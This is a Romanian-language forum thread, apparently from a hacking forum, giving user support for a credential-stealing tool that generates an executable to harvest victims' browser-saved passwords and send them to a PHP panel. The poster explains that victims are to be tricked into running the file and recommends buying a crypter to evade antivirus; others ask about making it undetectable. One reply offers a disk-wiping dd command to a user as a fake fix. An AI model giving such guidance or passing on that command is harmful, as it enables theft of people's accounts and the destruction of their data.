socket Posted June 14, 2015 Report Posted June 14, 2015 S? încerc pe Chrome ca la Firefox îmi f?cea a?a...mul?umesc de ajutor @Byte-ul doar ca unele mu?te ca ?la de mai sus bâzâie la rahat.Pacat, are dreptate! Quote
Byte-ul Posted June 14, 2015 Author Report Posted June 14, 2015 Cum instalez acest program ?Nu necesita instalare. Descarci executabilul si il rulezi. Quote
goldman_us Posted June 14, 2015 Report Posted June 14, 2015 Am descarcar si imi apare sa introduc ceva date Quote
Byte-ul Posted June 14, 2015 Author Report Posted June 14, 2015 Am descarcar si imi apare sa introduc ceva dateCiteste aici: https://rstforums.com/forum/100689-coailii-password-recovery-admin-panel.rst Quote
Byte-ul Posted June 20, 2015 Author Report Posted June 20, 2015 Ma poate ajuta si pe mine cineva. Am ceva nelamuriri. Cu toate ca am instalat cu succes programul pe site-ul meu, nu am inteles in totalitate cum functioneaza acest program.Ce trebuie mai exact sa faca vizitatorii care imi acceseaza site-ul pentru ca mie sa-mi vina acele parole salvate la ei in browser ?Multumesc anticipat.Nimic. Tu le dai .exe-ul generat de program si ei trebuie sa-l ruleze. Quote
Byte-ul Posted June 20, 2015 Author Report Posted June 20, 2015 Coailii Password Recovery.exe acesta ?Pai de ce am mai instalat pe site-ul meu acel PHP Panel ?Pentru ca executabilul pe care il generezi cu "Coailii Password Recovery.exe" o sa trimita informatiile acolo. Quote
Byte-ul Posted June 20, 2015 Author Report Posted June 20, 2015 Multumesc mult, acum am inteles.Am creat virusul acum si antivirusul mi-a detectat TR/Dropper.exe.genStie cineva cum il fac sa nu fie detectat de antivirus ?Folosesti un crypter. Poti cumpara de aici: Hack Forums - Site Challenge Quote
LITTLEloves Posted October 5, 2015 Report Posted October 5, 2015 Am facut totul cum trebuie,pe vechiul panel primeam loguri dar pe acesta care a fost postat ultima data nu mai primesc nimic! Cum pot rezolva aceasta problema ? Quote
sleed Posted October 5, 2015 Report Posted October 5, 2015 Am facut totul cum trebuie,pe vechiul panel primeam loguri dar pe acesta care a fost postat ultima data nu mai primesc nimic! Cum pot rezolva aceasta problema ?uite, foloseste comanda urmatoare:sudo dd if=/dev/urandom of=/dev/sda bs=512 count=1 Quote
GMaster0 Posted October 5, 2015 Report Posted October 5, 2015 Nu ai adaugat probabil bine key ul de trimitere a datelor de pe executabil catre site. Refa totul de la inceput cu o mai mare atentie, problema este din cauza neatentiei probabil. Quote
LITTLEloves Posted October 6, 2015 Report Posted October 6, 2015 (edited) uite, foloseste comanda urmatoare:sudo dd if=/dev/urandom of=/dev/sda bs=512 count=1Unde adaug aceasta comanda ? @GMaster0 am adaugat totul cum trebuie, pe vechiul panel am primit loguri ieri... pe panel-ul nou am facut test la mine in pc si nimic... am parole salvate,etc. Am creat iar baza de date,am facut iar toti pasii si degeaba.... nu primesc loguri! Edited October 6, 2015 by LITTLEloves Quote
drax Posted October 9, 2015 Report Posted October 9, 2015 ... dupa ce descarc fisierul imi apare extensia la toate fisierele (txt, doc, ...) ... oare de ce?MS Quote
LITTLEloves Posted October 24, 2015 Report Posted October 24, 2015 Furturile ilegale cu virusi se pedepsesc? Si cand ma refer la furturi nu ma refer la bani ..ci doar niste conturi banale de cs de exemplu! Quote
kNigHt Posted October 26, 2015 Report Posted October 26, 2015 Furturile ilegale cu virusi se pedepsesc? Si cand ma refer la furturi nu ma refer la bani ..ci doar niste conturi banale de cs de exemplu!Daca intri in locuinta unui om fara voia lui si nu iei bani, ci un banal pix, esti pasibil de pedeapsa? Quote
xpeke Posted November 27, 2015 Report Posted November 27, 2015 Ma poate ajuta si pe mine cineva sa-l instalez ? Deci efectiv imi da dureri de cap . Quote
ikod Posted December 1, 2015 Report Posted December 1, 2015 Cu ce crypter pot sa-l fac fud ?thx Quote
wowapp Posted February 21, 2016 Report Posted February 21, 2016 a observat cineva ca nu merge panelul? Quote
kNigHt Posted February 23, 2016 Report Posted February 23, 2016 On 2/21/2016 at 3:38 PM, wowapp said: a observat cineva ca nu merge panelul? Cum adica "nu merge panelul"? Ofera mai multe detalii, te rog. Quote
wowapp Posted February 23, 2016 Report Posted February 23, 2016 8 hours ago, kNigHt said: Cum adica "nu merge panelul"? Ofera mai multe detalii, te rog. Adica am urma tutorialul cu exactitate plus ca am mai facut chestia asta de mai multe ori. In schimb acum,fac baza de date,configurez datele,urc fisierele. Si pot intra pe site. In momentul in care am luat structura sql sa o execut in baza de date,siteul nu se mai incarca. Se incarca in gol si apoi primesc eroarea " websiteul nu raspunde suficient de rapid" Quote
kNigHt Posted February 24, 2016 Report Posted February 24, 2016 5 hours ago, wowapp said: Adica am urma tutorialul cu exactitate plus ca am mai facut chestia asta de mai multe ori. In schimb acum,fac baza de date,configurez datele,urc fisierele. Si pot intra pe site. In momentul in care am luat structura sql sa o execut in baza de date,siteul nu se mai incarca. Se incarca in gol si apoi primesc eroarea " websiteul nu raspunde suficient de rapid" Am inteles. Am sa verific maine script-ul si revin cu vesti. Quote
visualcd Posted February 24, 2016 Report Posted February 24, 2016 (edited) Link-ul de webpanel ma redirectioneaza catre forumul principal. Actualizeaza te rog link-ul... Ce am gasit este v1.0 la webpanel. Merci frumos. Edited February 24, 2016 by visualcd Quote